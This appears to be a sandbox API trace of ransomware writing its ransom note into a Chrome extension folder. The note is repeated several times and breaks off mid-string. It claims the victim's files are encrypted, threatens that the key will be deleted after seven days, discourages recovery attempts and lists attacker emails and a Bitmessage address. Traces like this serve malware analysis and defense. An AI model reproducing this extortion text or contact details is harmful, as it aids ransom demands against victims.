\r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef8bd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7f\x03\x1d", lpUsedDefaultChar=0x0) returned 8717 [0292.194] WriteFile (in: hFile=0x2e8, lpBuffer=0x1ef8bd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef8bd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0292.194] CloseHandle (hObject=0x2e8) returned 1 [0292.194] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\#readme_eman#.rtf")) returned 0xffffffff [0292.194] GetLastError () returned 0x2 [0292.194] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0292.243] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.243] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES 